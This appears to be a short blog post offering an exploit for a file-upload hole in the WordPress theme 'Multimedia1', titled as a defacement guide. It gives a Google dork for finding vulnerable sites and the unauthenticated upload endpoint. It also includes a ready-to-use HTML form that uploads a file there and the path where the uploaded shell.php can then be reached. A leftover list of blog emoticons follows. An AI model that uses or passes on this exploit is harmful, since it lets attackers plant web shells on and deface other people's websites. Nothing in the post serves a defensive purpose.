Deface Wordpress Themes Multimedia1

Wordpress Themes Multimedia1 Shell Upload Vulnerability | CSRF
Author : Berandal
Google Dork: inurl:/wp-content/themes/multimedia1/
Tested on: Win 7, Linux
Blog : http://www.maxteroit.com/

+-+-+-+-+-+-+-+-+
|B|e|r|a|n|d|a|l|
+-+-+-+-+-+-+-+-+

[!] Exploit : http://127.0.0.1/wp-content/themes/multimedia1/server/php/

[!] File Location : http://127.0.0.1/wp-content/themes/multimedia1/server/php/files/shell.php
[*] CSRF:
<html>
<body>
<form enctype="multipart/form-data" action="127.0.0.1/wp-content/themes/multimedia1/server/php/" method="post">
Your File: <input name="files[]" type="file" /><br />
<input type="submit" value="SIKAT!" />
</form>
</body>
</html>


EmoticonEmoticon

:)
:(
hihi
:-)
:D
=D
:-d
;(
;-(
@-)
:P
:o
:>)
(o)
:p
:-?
(p)
:-s
(m)
8-)
:-t
:-b
b-(
:-#
=p~
$-)
(y)
(f)
x-)
(k)
(h)
cheer